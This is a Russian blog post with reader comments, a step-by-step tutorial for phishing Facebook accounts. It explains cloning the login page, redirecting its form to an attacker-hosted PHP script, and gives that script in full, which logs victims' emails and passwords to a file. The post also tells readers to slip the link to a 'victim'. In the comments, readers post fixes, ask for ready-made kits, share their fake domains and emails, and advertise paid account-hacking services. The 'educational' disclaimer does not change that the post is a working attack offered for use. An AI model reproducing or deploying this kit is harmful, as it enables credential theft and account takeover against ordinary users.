среда, 23 мая 2012 г.

Как взломать Аккаунт в Facebook


Внимание!!! Весь следующий материал опубликован исключительно в УЧЕБНО-ПОЗНАВАТЕЛЬНЫХ целях и я не виноват, если кому то взбредёт в голову взламывать чужие страницы приведенным ниже способом. Перед прочтением данного материала я всем настоятельно рекомендую ознакомится со статьями 272 и 274 Уголовного Кодекса Российской Федерации.


Плюс ко всему ещё хочу сказать, что данная статья подойдет не всем, а только тем, кто имеет хоть какое-нибудь представление о сайтостроении и программировании на языке php.
Для начала немного теории. Существует множество способов взломать аккаунт в социальной сети: можно просидеть целую вечность подбирая пароли, можно бесконечно ебать програмный код социальной сети в поисках ошибок, можно связать владельца аккаунта и пытать его, пока не скажет пароль:) и т. д. В этой маленькой заметке я не собираюсь рассматривать их все, а расскажу только об одном способе - фишинге.
*Фишинг - это вид интернет мошенничества который подразумевает создание сайта внешне неотличимого от настоящего и после попадания пользователя на поддельную страницу мошенники всячески пытаются побудить пользователя ввести на ней свой логин и пароль, которые он использует для получения доступа к сайту и бессовестно крадут эти данные.
Да, такое бывает сплошь и рядом. Часто, в процессе работы в интернете, мы совершенно не замечаем, что и куда вводим и поэтому риск попадания на фишинговую страницу достаточно велик.
Теперь к делу. Сейчас я покажу, как можно создать фишинговую страницу и слямзить пароль и логин пользователя на примере социальной сети Facebook.

Шаг 1.
Сначала нам понадобится сервер с поддержкой php, я бы посоветовал бесплатный хостинг www.Ayola.net. Зарегистрировавшись подаём заявку на создание страницы www.facebook.pz9.ru, хотя впрочем неважно как она будет называться. После этого к вам придёт сообщение на почту, что нужная страница будет создана в течении 15 минут.
Затем качаем FTP  клиент FileZilla, чтобы закидывать файлы на сервер. Это можно скачать здесь.


Шаг 2.


Заходим на страницу www.facebook.com, нажимаем в меню браузера Файл > Сохранить как и сохраняем страницу и все прилежащие папки на рабочем столе. Затем я рекомендую переименовать файл "Добро пожаловать на Фейсбук - заходите, регистрируйтесь и находите друзей.htm" в "index.htm".
После открываем с помощью блокнота этот файл и ищем там форму <form id="login_form">. Меняем у этой формы свойство method на "GET" и свойство action на "http:\\www.facebook.pz9.ru\write.php".
А дальше запомним , что в форме есть два текстовых поля, которые называютя email и password. (это нам впоследствии очень пригодится).

Шаг 3.


Теперь закрываем index.htm и создаём файл write.php, которыйзаполняем следующем php кодом:


<?php
$fp = fopen("hack.txt", "a"); // Открываем файл в режиме записи
$mytext = $_GET['email']; // Логин
$mytest = $_GET['password']; // Пароль
$test = fwrite($fp, $mytext); // Запись в файл логина
$test = fwrite($fp, $mytest); // Запись в файл пароля
fclose($fp); //Закрытие файла
echo ('Ошибка, запрашиваемая страница не найдена, пройдите по ссылке <a href="http://www.facebook.com">facebook</a>');
?>
*Здесь и далее под логином подразумевается адрес электронной почты.

Шаг 4.
Проверяем создалась ли наша страничка, если она уже создана, подключаемся к серверу с помощью FTP клиента (адрес сервера и данные для входа вам сообщит хостер при регистрации) и закидываем туда файл index.htm и все что было сохранено браузером в шаге 2 тоже. Затем создаём пустой текстовый файл, называем его hack.txt и тоже кидаем на сервер вместе с файлом write.php.

Шаг 5.
Ну вот собственно и всё, теперь нужно как-нибудь незаметно подкинуть ссылку www.facebook.pz9.ru нашей жертве, но как это сделать решайте  сами. Самое главное, что когда жертва введёт свои данные на этой странице, то эти логин и пароль окажутся в файле hack.txt, который лежит на нашем сервере.  И если повезёт, то она этого даже и не заметит!

Ну а теперь традиционное "Как это работает?". А работает это очень просто. Когда пользователь ввводит свои данные на фальшивой странице и нажимает кнопку "Войти", браузер сохраняет его логин и пароль в переменных email и password соответственно, а затем отправляет методом GET на сервер к нашему php скрипту в файле write.php, который записывает значения этих переменных в файл hack.txt и отправляет пользователю сообщение  "Ошибка, запрашиваемая страница не найдена, пройдите по ссылке www.facebook.com". Пользователь спокойно переходит по ссылке и наши злодеяния остаются незамеченными! И остаётся только с помощью FTP клиента скачать файл hack.txt и дело сделано!
Впринципе имея соответствующие знания о веб технологиях это можно реализовать меньше чем за 15 минут. И кроме того этот способ может быть применим абсолютно для любой социалки, нужен только мозг, и растущие из правильного места руки.
Однако если вы простой необразованный юзер, то вам с этим нигокда не справится. Сидите и подбирайте пароли.
На сегодня всё, пока...

36 коммент.:

  1. он только майл дал а пароля нет (

    ОтветитьУдалить
  2. да-да, выдает только имейл без пароля в hack.txt..может изменился чуть изначальный файл index’а и теперь в нем надо что-то по другому менять..но что и как не знаю, можете, кто-нибудь, пожалуйста, помочь с решением этого вопроса)

    ОтветитьУдалить
  3. Будучи чайником, чуть по лазил по файлу индекса и разобрался, все работает..только в коде PHP файла вам надо поменять слово "password" на "pass", наслаждайтесь)

    ОтветитьУдалить
  4. usluga vzloma... zaregestriruites v site ;)
    cena xoroshaya

    http://SuperVzlom.com/?inv145718

    ОтветитьУдалить
  5. Ребят сделал всё но не выдаёт не хрена сайт получился я сам чайник ели ели разобрался помогите я не как с этим index ом не разберусь можете по шагово объяснить что там заменять

    ОтветитьУдалить
  6. Давай мыло, я тебе кину туда готовый индекс и пхп, только адрес сайта назови свой, чтобы я его в индекс впихнул

    ОтветитьУдалить
  7. Этот комментарий был удален автором.

    ОтветитьУдалить
  8. http://facebooksb.pz9.ru/ это сайт ) вот мыло fiko134@mail.ru Спасибо )

    ОтветитьУдалить
  9. Скиньте мне тоже пожалуйста готовый индекс и пхп
    anton-1995@inbox.ru

    ОтветитьУдалить
  10. Этот комментарий был удален автором.

    ОтветитьУдалить
  11. Антон Сазонов12 марта 2013 г., 12:25
    Скиньте мне тоже пожалуйста готовый индекс и пхп
    anton-1995@inbox.ru

    для этого тебе как минимум надо кинуть название своего сайта подставного, чтобы можно было его вставить в индекс

    ОтветитьУдалить
  12. очень-очень долго возился с индексом для контакта, делал все что только можно и нельзя, но результата нет(( просто все, что я делаю, это считай первый раз, просто дружу довольно с техникой и зачастую все выходит..а так познаний в PHP и скриптах никаких нет..может есть кто знающий, кто поможет сделать то же самое с контактом))
    ayola.net его сразу блокирует, поэтому создавал на 1gb.ua сайт

    ОтветитьУдалить
  13. http://facebook.xe0.ru/ Я думаю этого будет достаточно?))

    ОтветитьУдалить
  14. народ подскажите плиз, сделал все как в описании, ничего на "hack" не приходит!????

    ОтветитьУдалить
  15. не получается у меня.чаиник я.если кто сможете мне помочь.нужен срочно узнать логин и пароль феисбука кто захочет помочь пишите на мыло stefan.s82@mail.ru спасибо заранее

    ОтветитьУдалить
  16. создал страницу http://pulsuzface.pz9.ru/ , установил FZ. открыл страницу через ZF.. сделал там всё так как ты сказал... зохожу на сайт а он ошибку даёт... хотя до вставки файлов было написано что сайт создан... вот моё мыло... umud_inf13@bk.ru а сайт написан выше... пришли пожалуйста всё что нужно... буду очень благодарен

    ОтветитьУдалить
  17. zrasvstvuye prowu pomoqite mne nujno vzlomat akkaunt

    ОтветитьУдалить
  18. http://fasebook.zg5.ru /// blackzero97@gmail.com

    plz skin na eto milp

    ОтветитьУдалить
  19. парни Хелп!) я не фига не шарю в этом ... просто проблема в том что я Админ Странички в ФБ ... Официальной ... https://www.facebook.com/AzerbajdzanskaaRespublikanskaaLigaKvnVozrozdenie ...

    ее взломали и лишили меня прав доступа к ней... мне надо ее вернуть... как быть что делать ... знаю профиль взломщика...

    ОтветитьУдалить
  20. Автор тупой юзер, так как взламывать таких же тупых как ты неинтересно, а знающие люди не за что не введут свои данные перейдя по ссылке.

    ОтветитьУдалить
  21. все сделала, как написано, но не работает сама страница-ловушка
    сделанный сайт http://facebookps7.pz9.ru/
    почта annkuz93@gmail.com
    помогите ^^

    ОтветитьУдалить
  22. Этот комментарий был удален автором.

    ОтветитьУдалить
  23. Скиньте мне тоже пожалуйста готовый индекс и пхп bapxammepp@gmail.com
    http://bapxamma.pz9.ru/

    ОтветитьУдалить
  24. Могу помочь взломать!Смотрите мой фейк фейсбука http://faceb0o0k.96.lt
    И не только фейсбук!постучите скайп:agja55
    Не дорого

    ОтветитьУдалить
  25. Скиньте мне тоже пожалуйста готовый индекс и PHP адрес сайта http://fasebookerss.hol.es email: ayos@inbox.ru

    ОтветитьУдалить
  26. dobrii vecer ya ne ponemayu php no echeni bi hotelos toje po probivati ...pomoghite ktonibuti ...... zaranye sposibo
    mail : sorinburlacu967@gmail.com
    http://facebook1ver.pz9.ru/

    ОтветитьУдалить
  27. Этот комментарий был удален автором.

    ОтветитьУдалить
  28. Критическая ошибка при закачке файлов на сервер . Что я делаю не так ?

    ОтветитьУдалить
  29. Помогите пожалуйста Skype : lachikman

    ОтветитьУдалить
  30. админ. Я хочу помочь вам.
    Я не знаю, что-то об этом.
    пожалуйста, помогите мне получить мою Facebook обратно.
    если готовы помочь. отправьте сообщение на мой Google. спасибо

    ОтветитьУдалить